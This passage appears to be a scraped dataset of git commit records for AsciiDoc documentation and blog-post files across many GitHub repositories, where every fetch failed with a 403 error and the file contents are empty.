Binary-Repository-Manager-Feature-Matrix.adoc","repos":"binary-repositories-comparison\/binary-repositories-comparison.github.io,lavcraft\/binary-repositories-comparison.github.io,gAmUssA\/binary-repositories-comparison.github.io,lavcraft\/binary-repositories-comparison.github.io,gAmUssA\/binary-repositories-comparison.github.io","old_file":"Binary-Repository-Manager-Feature-Matrix.adoc","new_file":"Binary-Repository-Manager-Feature-Matrix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binary-repositories-comparison\/binary-repositories-comparison.github.io.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"188f707c0a4de7604069d71c9126dd886cf0d276","subject":"Update 2017-10-27-.adoc","message":"Update 2017-10-27-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-27-.adoc","new_file":"_posts\/2017-10-27-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fbf3d545ed95bcde8d9380cbcb472952c5990a2","subject":"ISIS-1521: reorganizes ugfun.adoc, to get rid of 'how-to' chaptergs","message":"ISIS-1521: reorganizes ugfun.adoc, to get rid of 'how-to' chaptergs\n","repos":"incodehq\/isis,apache\/isis,incodehq\/isis,incodehq\/isis,apache\/isis,apache\/isis,apache\/isis,estatio\/isis,estatio\/isis,estatio\/isis,apache\/isis,incodehq\/isis,oscarbou\/isis,oscarbou\/isis,oscarbou\/isis,oscarbou\/isis,estatio\/isis,apache\/isis","old_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/ugfun\/_ugfun_domain-class-ontology_mixins.adoc","new_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/ugfun\/_ugfun_domain-class-ontology_mixins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oscarbou\/isis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dff4ea04dc0e286e8cb43fea0177d3efc249aec5","subject":"Refer to the tcp_reverse example for full gen_server","message":"Refer to the tcp_reverse example for full gen_server\n","repos":"ninenines\/ranch,K2InformaticsGmbH\/ranch,layerhq\/ranch","old_file":"doc\/src\/guide\/protocols.asciidoc","new_file":"doc\/src\/guide\/protocols.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ninenines\/ranch.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"65580df92b2a7874c1f672071bdcc069f91e0716","subject":"[Documentation] Added Proxy module","message":"[Documentation] Added Proxy 
module\n","repos":"os890\/DS_Discuss,os890\/deltaspike-vote,danielsoro\/deltaspike,mlachat\/deltaspike,idontgotit\/deltaspike,os890\/DS_Discuss,idontgotit\/deltaspike,danielsoro\/deltaspike,rdicroce\/deltaspike,struberg\/deltaspike,chkal\/deltaspike,chkal\/deltaspike,rdicroce\/deltaspike,idontgotit\/deltaspike,chkal\/deltaspike,subaochen\/deltaspike,struberg\/deltaspike,chkal\/deltaspike,Danny02\/deltaspike,rdicroce\/deltaspike,subaochen\/deltaspike,mlachat\/deltaspike,subaochen\/deltaspike,struberg\/deltaspike,idontgotit\/deltaspike,rdicroce\/deltaspike,danielsoro\/deltaspike,apache\/deltaspike,os890\/deltaspike-vote,apache\/deltaspike,apache\/deltaspike,os890\/DS_Discuss,apache\/deltaspike,Danny02\/deltaspike,os890\/deltaspike-vote,struberg\/deltaspike,os890\/DS_Discuss,mlachat\/deltaspike,danielsoro\/deltaspike,Danny02\/deltaspike,subaochen\/deltaspike,os890\/deltaspike-vote,mlachat\/deltaspike,Danny02\/deltaspike","old_file":"documentation\/src\/main\/asciidoc\/proxy.adoc","new_file":"documentation\/src\/main\/asciidoc\/proxy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Danny02\/deltaspike.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3f39f18473d3123969f3c5d2f23c6426a3279af3","subject":"Update 2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","message":"Update 2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","new_file":"_posts\/2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edeab29949d5fafcea8e2a96b46a377c9821e5cf","subject":"Revert \"Update README.asciidoc\"","message":"Revert \"Update README.asciidoc\"\n\nThis reverts commit d89537b24c8936d50ebdffbedf9e4d0ca24014c5.\n","repos":"farleylai\/MonsoonPowerToolWS,farleylai\/MonsoonPowerToolWS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/farleylai\/MonsoonPowerToolWS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"66fb6d6691a05b41a67c03b17b5acb0c33eb7ab5","subject":"Update 2016-04-08-Micro-Service-Casual-Talk.adoc","message":"Update 2016-04-08-Micro-Service-Casual-Talk.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-08-Micro-Service-Casual-Talk.adoc","new_file":"_posts\/2016-04-08-Micro-Service-Casual-Talk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62904993dd879e8aa6df7ca0084e42318fe37e8c","subject":"Update 2017-02-24-Google-Extension.adoc","message":"Update 
2017-02-24-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Google-Extension.adoc","new_file":"_posts\/2017-02-24-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f155d0f4961bd559b685d969ea549d738084305b","subject":"Update 2017-04-05-Questo-e-un-test.adoc","message":"Update 2017-04-05-Questo-e-un-test.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-05-Questo-e-un-test.adoc","new_file":"_posts\/2017-04-05-Questo-e-un-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9b48287ee2ee2bf7e9fa2a2e6d55876c25758eb","subject":"fixing the link","message":"fixing the link","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"java\/chapters\/appc.adoc","new_file":"java\/chapters\/appc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"42b1c21db83ce939c6a26e7a51a7a9f59aff7e0c","subject":"Renamed '_posts\/2018-08-30-Docker-bro.adoc' to '_posts\/2018-08-30-Docker-cmd.adoc'","message":"Renamed '_posts\/2018-08-30-Docker-bro.adoc' to '_posts\/2018-08-30-Docker-cmd.adoc'","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2018-08-30-Docker-cmd.adoc","new_file":"_posts\/2018-08-30-Docker-cmd.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc5ffca9b3cae0b62d68e8308ad428d7875d23c0","subject":"Maven exercices","message":"Maven exercices\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Maven.adoc","new_file":"Maven.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15cf0844f0ae4c042c95b43d367659eaf3efe3fb","subject":"Added files via upload","message":"Added files via upload","repos":"weslleyrosalem\/CloudForms_Essentials,weslleyrosalem\/CloudForms_Essentials,ramrexx\/CloudForms_Essentials,weslleyrosalem\/CloudForms_Essentials,ramrexx\/CloudForms_Essentials","old_file":"style_guide.adoc","new_file":"style_guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/weslleyrosalem\/CloudForms_Essentials.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"283dc5dd536faddb189599e7e4e302497d8296c3","subject":"Update 
2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a41f932488377df75b1a1b6fb8eb36fad16984a","subject":"Update 2015-06-21-Pixi-mouseover-example.adoc","message":"Update 2015-06-21-Pixi-mouseover-example.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-06-21-Pixi-mouseover-example.adoc","new_file":"_posts\/2015-06-21-Pixi-mouseover-example.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7b8e01464182eb4fc10c3df53f7715edad89e44","subject":"Update 2016-08-24-Elasticsearch-and-YAML.adoc","message":"Update 2016-08-24-Elasticsearch-and-YAML.adoc","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2016-08-24-Elasticsearch-and-YAML.adoc","new_file":"_posts\/2016-08-24-Elasticsearch-and-YAML.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8286027ea8aca0f52452b5a71ddc9a81190acc72","subject":"Renamed '_posts\/2017-09-18-Adding-custom-domain-to-hubpress.adoc' to '_posts\/2017-09-22-Custom-domain-hubpress.adoc'","message":"Renamed '_posts\/2017-09-18-Adding-custom-domain-to-hubpress.adoc' to '_posts\/2017-09-22-Custom-domain-hubpress.adoc'","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2017-09-22-Custom-domain-hubpress.adoc","new_file":"_posts\/2017-09-22-Custom-domain-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdaba1993c2e1683d89c2b51bad1baadbd79a226","subject":"update backers badge","message":"update backers badge\n","repos":"dizitart\/nitrite-database,dizitart\/nitrite-database,dizitart\/nitrite-database,dizitart\/nitrite-database,dizitart\/nitrite-database","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dizitart\/nitrite-database.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a8dc7e9649f25b6edfd016e5d9dd242a397d1934","subject":"Update 2015-04-15-mon-blog.adoc","message":"Update 2015-04-15-mon-blog.adoc","repos":"yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io","old_file":"_posts\/2015-04-15-mon-blog.adoc","new_file":"_posts\/2015-04-15-mon-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/yoanndupuy\/yoanndupuy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91b7f0282b2ec23a0905fd8c4ecb991d41420ce5","subject":"Update 2016-09-26-Math-Quantifiers.adoc","message":"Update 2016-09-26-Math-Quantifiers.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-09-26-Math-Quantifiers.adoc","new_file":"_posts\/2016-09-26-Math-Quantifiers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fa8463fd84fd2eef21b7ce94ff55052c6ca9c01","subject":"Update 2020-02-06-SSE-SIMD.adoc","message":"Update 2020-02-06-SSE-SIMD.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2020-02-06-SSE-SIMD.adoc","new_file":"_posts\/2020-02-06-SSE-SIMD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"514af04783bf64417667958d5426a3a3b4299f26","subject":"Update 2014-03-06-Eclipse-Tips-004-Echapper-les-caracteres-lorsque-lon-colle-dans-un-String.adoc","message":"Update 2014-03-06-Eclipse-Tips-004-Echapper-les-caracteres-lorsque-lon-colle-dans-un-String.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2014-03-06-Eclipse-Tips-004-Echapper-les-caracteres-lorsque-lon-colle-dans-un-String.adoc","new_file":"_posts\/2014-03-06-Eclipse-Tips-004-Echapper-les-caracteres-lorsque-lon-colle-dans-un-String.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f31ca44eb3e558eed05d2aa31973ab410b58585","subject":"Add assignment.adoc (copied from the provided pdf)","message":"Add assignment.adoc (copied from the provided pdf)\n","repos":"ciarand\/operating-systems-memory-management-assignment","old_file":"assignment.adoc","new_file":"assignment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ciarand\/operating-systems-memory-management-assignment.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"505f01e4dd8a0e01eebd50fcfd3e4e25c17947c8","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-policy-ipfiltering","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-ipfiltering.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3b8e35e1fbb6e904c1349689af1c6aaa34d78dd0","subject":"testing something","message":"testing something","repos":"kbase\/nextgen,kbase\/nextgen,kbase\/nextgen","old_file":"docs\/challenges\/test_something.asciidoc","new_file":"docs\/challenges\/test_something.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kbase\/nextgen.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"577dc28f0040246534e9a7df165fdd0aa8689669","subject":"formatting and minor additions","message":"formatting and minor additions\n","repos":"hawkular\/hawkular-services,hawkular\/hawkular-services","old_file":"docker-dist\/README.adoc","new_file":"docker-dist\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2908518f9f3d67240efabbd10b2b5cb5709d9dd6","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-policy-transform-headers","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-transform-headers.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6e3684eb35de7cd62f1407358ddd048cbfac78ce","subject":"Update 2016-07-08-Word-Press-3.adoc","message":"Update 2016-07-08-Word-Press-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"800dec80661362f967f9ed58acbc581372dbed14","subject":"Update 2018-11-01-gohu-netlify.adoc","message":"Update 2018-11-01-gohu-netlify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-01-gohu-netlify.adoc","new_file":"_posts\/2018-11-01-gohu-netlify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7e4686c36f87f70e95d98982cc6a0ef8cabacee","subject":"git: Add a `prerequisites` section to the readme","message":"git: Add a `prerequisites` section to the readme\n\nThe prerequisites section lists all the software that users will have to\ninstall if they want to use the configuration. 
Additionally the versions\nof the software should be listed, so that no incompatabilities arise.\n","repos":"PigeonF\/.dotfiles","old_file":"git\/README.adoc","new_file":"git\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PigeonF\/.dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec947bf5d3649f13844f6e5dc86280be91da69bc","subject":"deref","message":"deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/03\/11\/deref.adoc","new_file":"content\/news\/2022\/03\/11\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5f540ecb88cbc281b5fb15d073fa7ad647ba4a4c","subject":"Update 2016-03-30-Subiendo-el-exploit.adoc","message":"Update 2016-03-30-Subiendo-el-exploit.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a22dc335d0020d73384b1ea71fabd342cfc15b6d","subject":"Update 2016-08-27.adoc","message":"Update 2016-08-27.adoc","repos":"apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io","old_file":"_posts\/2016-08-27.adoc","new_file":"_posts\/2016-08-27.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apalkoff\/apalkoff.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52f27805e3b28948f3b9e5438cf3bb50bce83bcd","subject":"Deleted 2015-5-10-uGUI.adoc","message":"Deleted 2015-5-10-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"2015-5-10-uGUI.adoc","new_file":"2015-5-10-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7747003a135ab59912015310d1f6117c8c11fd01","subject":"Publish 2015-5-10-uGui.adoc","message":"Publish 2015-5-10-uGui.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"2015-5-10-uGui.adoc","new_file":"2015-5-10-uGui.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab322da24c66555248c2c5d154fa7b9e2457ff1d","subject":"Upd links","message":"Upd links\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"DevOps\/IBM Cloud.adoc","new_file":"DevOps\/IBM Cloud.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32b7226290bcc0004fdf42f25c594abee6101294","subject":"Added BinTray","message":"Added BinTray\n","repos":"rmuhamedgaliev\/JPS,rmuhamedgaliev\/JPS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/JPS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eb23c7afb059cb8cce8f60fe396a592df7995916","subject":"Start README.asciidoc","message":"Start README.asciidoc\n","repos":"rmuhamedgaliev\/JPS,rmuhamedgaliev\/JPS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/JPS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e335b52a58126bbc4c372750af30e5eee6ba461","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24dda127f9ad9febc2b27c4758785674d2e550cf","subject":"Delete README-es.adoc","message":"Delete README-es.adoc","repos":"gsha0\/hubpress.io,gsha0\/hubpress.io,gsha0\/hubpress.io,gsha0\/hubpress.io","old_file":"README-es.adoc","new_file":"README-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gsha0\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab82e2abb212dc289495d7498e4112601b6e1858","subject":"Delete README-ja.adoc","message":"Delete README-ja.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"README-ja.adoc","new_file":"README-ja.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c69cebfa1f6e42f1fc3a43f60efa8beb6b586a4","subject":"tickle build","message":"tickle build","repos":"mhaberler\/machinekit,ArcEye\/MK-Qt5,mhaberler\/machinekit,araisrobo\/machinekit,araisrobo\/machinekit,ArcEye\/MK-Qt5,mhaberler\/machinekit,mhaberler\/machinekit,mhaberler\/machinekit,mhaberler\/machinekit,strahlex\/machinekit,ArcEye\/MK-Qt5,strahlex\/machinekit,araisrobo\/machinekit,strahlex\/machinekit,araisrobo\/machinekit,ArcEye\/MK-Qt5,ArcEye\/MK-Qt5,mhaberler\/machinekit,strahlex\/machinekit,araisrobo\/machinekit,araisrobo\/machinekit,mhaberler\/machinekit,strahlex\/machinekit,ArcEye\/MK-Qt5,strahlex\/machinekit,araisrobo\/machinekit,ArcEye\/MK-Qt5,ArcEye\/MK-Qt5,strahlex\/machinekit,araisrobo\/machinekit,araisrobo\/machinekit","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/araisrobo\/machinekit.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} 
{"commit":"510a1a1cac2c37d3c7974a3a867a6935b97cce0d","subject":"Docs: Replace deprecated pluginList with Arrays.asList (#24270)","message":"Docs: Replace deprecated pluginList with Arrays.asList (#24270)\n\nESIntegTestCase#pluginList was remove removed in ES 5.0. We are using Arrays.asList instead.","repos":"strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc","old_file":"docs\/reference\/testing\/testing-framework.asciidoc","new_file":"docs\/reference\/testing\/testing-framework.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/strapdata\/elassandra5-rc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"20d5b378e6ec61f1c27811376f8e8183ca345e71","subject":"typo in performance.adoc (#929)","message":"typo in performance.adoc (#929)\n\n","repos":"takezoe\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/performance.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/performance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elastic\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ed389c170da3c58aab6ddbded70d3fd7fede0beb","subject":"fix link rendering (#1016)","message":"fix link rendering (#1016)\n\n","repos":"scholzj\/barnabas,ppatierno\/kaas,ppatierno\/kaas,scholzj\/barnabas","old_file":"documentation\/book\/proc-kafka-inline-logging.adoc","new_file":"documentation\/book\/proc-kafka-inline-logging.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scholzj\/barnabas.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e852a2ac7758eda0240d33dce7d4c3903c5cd9c","subject":"Update 2018-03-12-P-H-Per-Golang.adoc","message":"Update 2018-03-12-P-H-Per-Golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-12-P-H-Per-Golang.adoc","new_file":"_posts\/2018-03-12-P-H-Per-Golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc7c96f519317df62c881fb179cc2a368b90baee","subject":"Eclipse wording","message":"Eclipse wording\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Dev tools\/Exercice.adoc","new_file":"Dev tools\/Exercice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 